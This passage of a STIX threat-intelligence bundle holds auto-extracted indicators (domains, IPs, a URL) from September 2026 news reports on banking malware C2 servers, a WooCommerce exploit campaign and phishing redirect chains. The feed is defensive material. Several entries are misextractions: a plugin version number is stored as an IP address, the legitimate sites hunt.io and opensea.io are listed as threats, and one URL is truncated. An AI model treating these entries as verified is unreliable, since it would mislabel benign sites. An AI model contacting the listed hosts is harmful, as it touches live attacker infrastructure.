{"type":"bundle","id":"bundle--b2d0deba-154c-4abf-9428-2689558e447b","objects":[{"type":"identity","spec_version":"2.1","id":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","created":"2026-09-15T22:15:19.967Z","modified":"2026-09-15T22:15:19.967Z","name":"ZeroHour","identity_class":"system","description":"Indicators auto-extracted from public security reporting. Verify before use."},{"type":"indicator","spec_version":"2.1","id":"indicator--25d72502-0545-48e1-a946-0cb0ace70a26","created":"2026-09-15T19:38:58.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: vip311.cc","description":"Seen in \"Low-quality casino sites conceal highly dangerous threat actors\" (The Register · Security). Context: e. Screenshots of three casino sites identified by Infoblox—vip311[.]cc, zzyud[.]com and zenplay77-x[.]space—with vip311[.]cc ass","pattern":"[domain-name:value = 'vip311.cc']","pattern_type":"stix","valid_from":"2026-09-15T19:38:58.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"The Register · Security","url":"https://www.theregister.com/security/2026/09/15/low-quality-casino-sites-conceal-highly-dangerous-threat-actors/5296652"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--04788ac5-4465-4e55-8243-61c40495a31d","created":"2026-09-15T19:38:58.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: zenplay77-x.space","description":"Seen in \"Low-quality casino sites conceal highly dangerous threat actors\" (The Register · Security). Context: o sites identified by Infoblox—vip311[.]cc, zzyud[.]com and zenplay77-x[.]space—with vip311[.]cc associated with PeckBirdy. The problem i","pattern":"[domain-name:value = 'zenplay77-x.space']","pattern_type":"stix","valid_from":"2026-09-15T19:38:58.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"The Register · Security","url":"https://www.theregister.com/security/2026/09/15/low-quality-casino-sites-conceal-highly-dangerous-threat-actors/5296652"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--d89be287-9a79-4bd2-825f-105c557d1933","created":"2026-09-15T19:38:58.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: zzyud.com","description":"Seen in \"Low-quality casino sites conceal highly dangerous threat actors\" (The Register · Security). Context: s of three casino sites identified by Infoblox—vip311[.]cc, zzyud[.]com and zenplay77-x[.]space—with vip311[.]cc associated with","pattern":"[domain-name:value = 'zzyud.com']","pattern_type":"stix","valid_from":"2026-09-15T19:38:58.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"The Register · Security","url":"https://www.theregister.com/security/2026/09/15/low-quality-casino-sites-conceal-highly-dangerous-threat-actors/5296652"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--eb228c0b-e269-4e07-9f8e-81e1e5f08356","created":"2026-09-15T18:54:14.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: luizestrelhashapr.online","description":"Seen in \"KREMLIN Banking Malware Hijacks Chrome and Edge to Steal Credentials and Session Tokens\" (The Hacker News). Context: filtrating browser data for each profile to its C2 server (\"luizestrelhashapr[.]online:443\") but not before requesting extensive access to brows","pattern":"[domain-name:value = 'luizestrelhashapr.online']","pattern_type":"stix","valid_from":"2026-09-15T18:54:14.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"The Hacker News","url":"https://thehackernews.com/2026/09/kremlin-banking-malware-hijacks-chrome.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--3928e920-216c-4342-aac3-3cc5cb9a02e8","created":"2026-09-15T18:54:14.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: volmira.site","description":"Seen in \"KREMLIN Banking Malware Hijacks Chrome and Edge to Steal Credentials and Session Tokens\" (The Hacker News). Context: to the same Ethereum smart contract to fetch two domains – volmira[.]site and zaviro[.]online – and queries the former to obtain th","pattern":"[domain-name:value = 'volmira.site']","pattern_type":"stix","valid_from":"2026-09-15T18:54:14.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"The Hacker News","url":"https://thehackernews.com/2026/09/kremlin-banking-malware-hijacks-chrome.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--c51097c3-3587-40ab-9fc0-60293613ab91","created":"2026-09-15T18:54:14.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: zaviro.online","description":"Seen in \"KREMLIN Banking Malware Hijacks Chrome and Edge to Steal Credentials and Session Tokens\" (The Hacker News). Context: um smart contract to fetch two domains – volmira[.]site and zaviro[.]online – and queries the former to obtain the browser extension","pattern":"[domain-name:value = 'zaviro.online']","pattern_type":"stix","valid_from":"2026-09-15T18:54:14.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"The Hacker News","url":"https://thehackernews.com/2026/09/kremlin-banking-malware-hijacks-chrome.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--49176e5a-382c-4540-8e16-8b35fc84e780","created":"2026-09-15T15:23:19.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: c2iznja.com","description":"Seen in \"BambooToken Malware Uses MQTT to Control Windows and Linux Systems\" (The Hacker News). Context: on the machine and exfiltrate them to the C2 server (\"api80.c2iznja[.]com\"). \"The domains used Cloudflare as a proxy for their infr","pattern":"[domain-name:value = 'c2iznja.com']","pattern_type":"stix","valid_from":"2026-09-15T15:23:19.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"The Hacker News","url":"https://thehackernews.com/2026/09/bambootoken-malware-uses-mqtt-to.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--4550748b-9170-41ac-9003-a47dd3173fa9","created":"2026-09-15T15:23:19.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: chat5188.tk","description":"Seen in \"BambooToken Malware Uses MQTT to Control Windows and Linux Systems\" (The Hacker News). Context: gather system details and transmit them to the C2 server (\"chat5188[.]tk\"). In response, the server issues commands to load a plug","pattern":"[domain-name:value = 'chat5188.tk']","pattern_type":"stix","valid_from":"2026-09-15T15:23:19.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"The Hacker News","url":"https://thehackernews.com/2026/09/bambootoken-malware-uses-mqtt-to.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--964a2878-56b6-4155-a8a1-5dc8cbe6b3cc","created":"2026-09-15T14:45:10.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"ipv4: 2.0.3.1","description":"Seen in \"Hackers target WordPress sites via third-party WooCommerce plugin\" (BleepingComputer). Context: aw is tracked as CVE-2026-27540 and impacts plugin versions 2.0.3.1 and older. It is an unauthenticated arbitrary file-upload v","pattern":"[ipv4-addr:value = '2.0.3.1']","pattern_type":"stix","valid_from":"2026-09-15T14:45:10.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"BleepingComputer","url":"https://www.bleepingcomputer.com/news/security/hackers-target-wordpress-sites-via-third-party-woocommerce-plugin/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--43553be0-cc94-404b-b315-e3999ba3bb4b","created":"2026-09-15T13:33:58.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: hunt.io","description":"Seen in \"Thai Broadband Provider Hacked via Fortinet Vulnerability\" (SecurityWeek). Context: mand-and-control (C&C) platform for remote administration,” Hunt.io says. Next, the attackers used various scripts for host dis","pattern":"[domain-name:value = 'hunt.io']","pattern_type":"stix","valid_from":"2026-09-15T13:33:58.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"SecurityWeek","url":"https://www.securityweek.com/thai-broadband-provider-hacked-via-fortinet-vulnerability/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--977a417f-e533-4dcf-885c-9e1685a8516b","created":"2026-09-15T13:04:34.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: 31-59-175-195.syd.nbn.aussiebb.net","description":"Seen in \"Phishing Attacks Abuse Trusted Email Infrastructure and URL Cloaking to Evade Security Filters\" (GBHackers). Context: gets through redirect and tracking infrastructure including 31-59-175-195[.]syd[.]nbn[.]aussiebb[.]net , loadswage[.]com , and eightindigostove[.]com . Th","pattern":"[domain-name:value = '31-59-175-195.syd.nbn.aussiebb.net']","pattern_type":"stix","valid_from":"2026-09-15T13:04:34.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/trusted-email-abuse/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--7bee94bf-c51c-482f-a04f-a0f5393b4936","created":"2026-09-15T13:04:34.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: eightindigostove.com","description":"Seen in \"Phishing Attacks Abuse Trusted Email Infrastructure and URL Cloaking to Evade Security Filters\" (GBHackers). Context: 75-195[.]syd[.]nbn[.]aussiebb[.]net , loadswage[.]com , and eightindigostove[.]com . The final operation was assessed as fake renewal scarew","pattern":"[domain-name:value = 'eightindigostove.com']","pattern_type":"stix","valid_from":"2026-09-15T13:04:34.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/trusted-email-abuse/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--d1a80ad1-17fa-4c0c-b68c-7711c07be2ec","created":"2026-09-15T13:04:34.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: loadswage.com","description":"Seen in \"Phishing Attacks Abuse Trusted Email Infrastructure and URL Cloaking to Evade Security Filters\" (GBHackers). Context: ture including 31-59-175-195[.]syd[.]nbn[.]aussiebb[.]net , loadswage[.]com , and eightindigostove[.]com . The final operation was as","pattern":"[domain-name:value = 'loadswage.com']","pattern_type":"stix","valid_from":"2026-09-15T13:04:34.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/trusted-email-abuse/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--1eaf6b4a-af2c-43c9-adab-c0194286df50","created":"2026-09-15T13:04:34.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: moolaah.com","description":"Seen in \"Phishing Attacks Abuse Trusted Email Infrastructure and URL Cloaking to Evade Security Filters\" (GBHackers). Context: d through Amazon Simple Email Service from the DKIM-aligned moolaah[.]com domain and urged recipients to open a supposed Mahnschrei","pattern":"[domain-name:value = 'moolaah.com']","pattern_type":"stix","valid_from":"2026-09-15T13:04:34.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/trusted-email-abuse/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--8957dccb-3d62-4514-9c9f-f5f4ab77390a","created":"2026-09-15T13:04:34.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: opensea.io","description":"Seen in \"Phishing Attacks Abuse Trusted Email Infrastructure and URL Cloaking to Evade Security Filters\" (GBHackers). Context: itting a concealed POST request and eventually resolving to opensea[.]io during live analysis. Virus Bulletin’s Q3 2026 VBSpam tes","pattern":"[domain-name:value = 'opensea.io']","pattern_type":"stix","valid_from":"2026-09-15T13:04:34.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/trusted-email-abuse/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--6b7e334c-8d84-4d59-a9ef-be4484593b2c","created":"2026-09-15T13:04:34.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: web5-4s4c-online-garantibbva.vibtee.com","description":"Seen in \"Phishing Attacks Abuse Trusted Email Infrastructure and URL Cloaking to Evade Security Filters\" (GBHackers). Context: s IPv4 address 103[.]193[.]179[.]223 and redirected through web5-4s4c-online-garantibbva[.]vibtee[.]com/ro/ before ultimately reaching Google during verificati","pattern":"[domain-name:value = 'web5-4s4c-online-garantibbva.vibtee.com']","pattern_type":"stix","valid_from":"2026-09-15T13:04:34.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/trusted-email-abuse/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--e9236c28-deac-42ed-87ec-781631e680e2","created":"2026-09-15T13:04:34.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: website-2df62808.mvplineup.com","description":"Seen in \"Phishing Attacks Abuse Trusted Email Infrastructure and URL Cloaking to Evade Security Filters\" (GBHackers). Context: ent reminder. No file was attached. Its embedded URL led to website-2df62808[.]mvplineup[.]com/audacity/underside , a first-stage page containing deco","pattern":"[domain-name:value = 'website-2df62808.mvplineup.com']","pattern_type":"stix","valid_from":"2026-09-15T13:04:34.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/trusted-email-abuse/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--c49602da-9540-4012-abbf-8210a039dece","created":"2026-09-15T13:04:34.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: xmasbrick.com","description":"Seen in \"Phishing Attacks Abuse Trusted Email Infrastructure and URL Cloaking to Evade Security Filters\" (GBHackers). Context: : Virus Bulletin). Sent from the DKIM-aligned but unrelated xmasbrick[.]com domain, the message embedded an IPv6-mapped address: hxxp","pattern":"[domain-name:value = 'xmasbrick.com']","pattern_type":"stix","valid_from":"2026-09-15T13:04:34.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/trusted-email-abuse/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--a26dc623-b309-4fe7-b5e4-16557aacd4d6","created":"2026-09-15T13:04:34.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"url: http://[0000:0000:0000:0000:0000:FFFF:67C1:B3DF","description":"Seen in \"Phishing Attacks Abuse Trusted Email Infrastructure and URL Cloaking to Evade Security Filters\" (GBHackers). Context: [.]com domain, the message embedded an IPv6-mapped address: hxxp://[0000:0000:0000:0000:0000:FFFF:67C1:B3DF]/11881659 . That notation represents IPv4 address 103[.]193","pattern":"[url:value = 'http://[0000:0000:0000:0000:0000:FFFF:67C1:B3DF']","pattern_type":"stix","valid_from":"2026-09-15T13:04:34.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/trusted-email-abuse/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--e934dae2-06e3-4369-b363-ee0b4d64158e","created":"2026-09-15T12:05:55.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"ipv4: 104.194.9.138","description":"Seen in \"Hackers Actively Exploit Critical WooCommerce Plugin Vulnerability to Upload PHP Backdoors\" (GBHackers). Context: 5389::1 4 92.241.13.140 5 23.137.105.214 6 23.180.120.140 7 104.194.9.138 8 187.75.114.36 Note: IP addresses and domains are intentio","pattern":"[ipv4-addr:value = '104.194.9.138']","pattern_type":"stix","valid_from":"2026-09-15T12:05:55.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/woocommerce-plugin-vulnerability/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--628fd733-723a-4149-a68a-a25259de42c3","created":"2026-09-15T12:05:55.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"ipv4: 187.75.114.36","description":"Seen in \"Hackers Actively Exploit Critical WooCommerce Plugin Vulnerability to Upload PHP Backdoors\" (GBHackers). Context: .13.140 5 23.137.105.214 6 23.180.120.140 7 104.194.9.138 8 187.75.114.36 Note: IP addresses and domains are intentionally defanged (","pattern":"[ipv4-addr:value = '187.75.114.36']","pattern_type":"stix","valid_from":"2026-09-15T12:05:55.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/woocommerce-plugin-vulnerability/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--21517c2e-c162-4306-abf2-1b33f765624a","created":"2026-09-15T12:05:55.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"ipv4: 2.0.3.1","description":"Seen in \"Hackers Actively Exploit Critical WooCommerce Plugin Vulnerability to Upload PHP Backdoors\" (GBHackers). Context: bility , tracked as CVE-2026-27540, affects plugin versions 2.0.3.1 and earlier and has received a CVSS severity score of 9.8 o","pattern":"[ipv4-addr:value = '2.0.3.1']","pattern_type":"stix","valid_from":"2026-09-15T12:05:55.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/woocommerce-plugin-vulnerability/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--06507871-97f5-4741-a6a3-ba72a0eb21bc","created":"2026-09-15T12:05:55.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"ipv4: 23.137.105.214","description":"Seen in \"Hackers Actively Exploit Critical WooCommerce Plugin Vulnerability to Upload PHP Backdoors\" (GBHackers). Context: 3 2 31.59.129.150 3 2a0f:85c1:840:5389::1 4 92.241.13.140 5 23.137.105.214 6 23.180.120.140 7 104.194.9.138 8 187.75.114.36 Note: IP a","pattern":"[ipv4-addr:value = '23.137.105.214']","pattern_type":"stix","valid_from":"2026-09-15T12:05:55.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/woocommerce-plugin-vulnerability/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--711694c2-e48a-4271-993f-f30482ee85f8","created":"2026-09-15T12:05:55.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"ipv4: 23.180.120.140","description":"Seen in \"Hackers Actively Exploit Critical WooCommerce Plugin Vulnerability to Upload PHP Backdoors\" (GBHackers). Context: 3 2a0f:85c1:840:5389::1 4 92.241.13.140 5 23.137.105.214 6 23.180.120.140 7 104.194.9.138 8 187.75.114.36 Note: IP addresses and doma","pattern":"[ipv4-addr:value = '23.180.120.140']","pattern_type":"stix","valid_from":"2026-09-15T12:05:55.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/woocommerce-plugin-vulnerability/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--363ebd92-1bbf-4d9e-bc53-1f1196c55428","created":"2026-09-15T12:05:55.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"ipv4: 31.59.129.150","description":"Seen in \"Hackers Actively Exploit Critical WooCommerce Plugin Vulnerability to Upload PHP Backdoors\" (GBHackers). Context: e most active sources reportedly included 92.241.13.213 and 31.59.129.150, each responsible for more than 24,000 blocked requests, fo","pattern":"[ipv4-addr:value = '31.59.129.150']","pattern_type":"stix","valid_from":"2026-09-15T12:05:55.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/woocommerce-plugin-vulnerability/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--915fc123-c6e6-4964-acbc-97eb233416d5","created":"2026-09-15T12:05:55.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"ipv4: 92.241.13.140","description":"Seen in \"Hackers Actively Exploit Critical WooCommerce Plugin Vulnerability to Upload PHP Backdoors\" (GBHackers). Context: r 1 92.241.13.213 2 31.59.129.150 3 2a0f:85c1:840:5389::1 4 92.241.13.140 5 23.137.105.214 6 23.180.120.140 7 104.194.9.138 8 187.75.","pattern":"[ipv4-addr:value = '92.241.13.140']","pattern_type":"stix","valid_from":"2026-09-15T12:05:55.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/woocommerce-plugin-vulnerability/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--a5521471-1f74-4479-8548-c7059a800533","created":"2026-09-15T12:05:55.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"ipv4: 92.241.13.213","description":"Seen in \"Hackers Actively Exploit Critical WooCommerce Plugin Vulnerability to Upload PHP Backdoors\" (GBHackers). Context: and August 30. The most active sources reportedly included 92.241.13.213 and 31.59.129.150, each responsible for more than 24,000 bl","pattern":"[ipv4-addr:value = '92.241.13.213']","pattern_type":"stix","valid_from":"2026-09-15T12:05:55.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/woocommerce-plugin-vulnerability/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--34d1d11e-9d47-4be0-8328-4754feb474f5","created":"2026-09-15T12:02:50.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: 31-59-175-195.syd.nbn.aussiebb.net","description":"Seen in \"New Phishing Attacks Use Trusted Email Infrastructure and URL Cloaking to Bypass Security Tools\" (Cyber Security News). Context: of compromise (IoCs):- Type Indicator Description Hostname 31-59-175-195[.]syd[.]nbn[.]aussiebb[.]net Redirect infrastructure used in the antivirus renew","pattern":"[domain-name:value = '31-59-175-195.syd.nbn.aussiebb.net']","pattern_type":"stix","valid_from":"2026-09-15T12:02:50.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/new-phishing-attacks/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--f97807cd-8a63-4b23-86e9-0c1977a84ac1","created":"2026-09-15T12:02:50.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: eightindigostove.com","description":"Seen in \"New Phishing Attacks Use Trusted Email Infrastructure and URL Cloaking to Bypass Security Tools\" (Cyber Security News). Context: ssociated with the antivirus renewal phishing sample Domain eightindigostove[.]com Domain hosting the unsubscribe path in the antivirus rene","pattern":"[domain-name:value = 'eightindigostove.com']","pattern_type":"stix","valid_from":"2026-09-15T12:02:50.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/new-phishing-attacks/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--c223c6b2-740a-4fa7-b0c1-5da209026b82","created":"2026-09-15T12:02:50.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: loadswage.com","description":"Seen in \"New Phishing Attacks Use Trusted Email Infrastructure and URL Cloaking to Bypass Security Tools\" (Cyber Security News). Context: sed in the antivirus renewal scareware phishing flow Domain loadswage[.]com Redirect infrastructure associated with the antivirus ren","pattern":"[domain-name:value = 'loadswage.com']","pattern_type":"stix","valid_from":"2026-09-15T12:02:50.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/new-phishing-attacks/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--5cbfd580-d63f-44e6-b5b2-cf5bd5dcb500","created":"2026-09-15T12:02:50.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: moolaah.com","description":"Seen in \"New Phishing Attacks Use Trusted Email Infrastructure and URL Cloaking to Bypass Security Tools\" (Cyber Security News). Context: path in the antivirus renewal phishing sample Sender domain moolaah[.]com DKIM-aligned sender domain used for the cloaked overdue-p","pattern":"[domain-name:value = 'moolaah.com']","pattern_type":"stix","valid_from":"2026-09-15T12:02:50.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/new-phishing-attacks/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--c4dc7b10-17fd-43c9-8376-9f356fce612a","created":"2026-09-15T12:02:50.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: opensea.io","description":"Seen in \"New Phishing Attacks Use Trusted Email Infrastructure and URL Cloaking to Bypass Security Tools\" (Cyber Security News). Context: ing page used in the invoice phishing redirect chain Domain opensea[.]io Final destination reached after the cloaking and browser-","pattern":"[domain-name:value = 'opensea.io']","pattern_type":"stix","valid_from":"2026-09-15T12:02:50.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/new-phishing-attacks/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--b0169711-1ba6-4c7b-a4fb-2213f8fe645b","created":"2026-09-15T12:02:50.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: web5-4s4c-online-garantibbva.vibtee.com","description":"Seen in \"New Phishing Attacks Use Trusted Email Infrastructure and URL Cloaking to Bypass Security Tools\" (Cyber Security News). Context: Pv4 address represented by the IPv6-mapped URL notation URL web5-4s4c-online-garantibbva[.]vibtee[.]com/ro/ Redirect destination in the Romanian PSD2 banking p","pattern":"[domain-name:value = 'web5-4s4c-online-garantibbva.vibtee.com']","pattern_type":"stix","valid_from":"2026-09-15T12:02:50.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/new-phishing-attacks/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--2b074d12-7683-448b-a974-436656a2ce5e","created":"2026-09-15T12:02:50.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: website-2df62808.mvplineup.com","description":"Seen in \"New Phishing Attacks Use Trusted Email Infrastructure and URL Cloaking to Bypass Security Tools\" (Cyber Security News). Context: omain used for the cloaked overdue-payment invoice lure URL website-2df62808[.]mvplineup[.]com/audacity/underside First-stage cloaking page used in th","pattern":"[domain-name:value = 'website-2df62808.mvplineup.com']","pattern_type":"stix","valid_from":"2026-09-15T12:02:50.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/new-phishing-attacks/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--928f8d18-b012-441b-a451-51fbef06b051","created":"2026-09-15T12:02:50.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: xmasbrick.com","description":"Seen in \"New Phishing Attacks Use Trusted Email Infrastructure and URL Cloaking to Bypass Security Tools\" (Cyber Security News). Context: the cloaking and browser-fingerprinting stage Sender domain xmasbrick[.]com DKIM-aligned but unrelated sender domain used in the Roma","pattern":"[domain-name:value = 'xmasbrick.com']","pattern_type":"stix","valid_from":"2026-09-15T12:02:50.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/new-phishing-attacks/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--6fdafe8e-105d-4253-88e6-da9df22c0a8b","created":"2026-09-15T12:02:50.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"url: http://[0000:0000:0000:0000:0000:FFFF:67C1:B3DF","description":"Seen in \"New Phishing Attacks Use Trusted Email Infrastructure and URL Cloaking to Bypass Security Tools\" (Cyber Security News). Context: nder domain used in the Romanian banking phishing email URL hxxp://[0000:0000:0000:0000:0000:FFFF:67C1:B3DF]/11881659 IPv6-mapped IP-literal URL embedded in the bankin","pattern":"[url:value = 'http://[0000:0000:0000:0000:0000:FFFF:67C1:B3DF']","pattern_type":"stix","valid_from":"2026-09-15T12:02:50.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Cyber Security 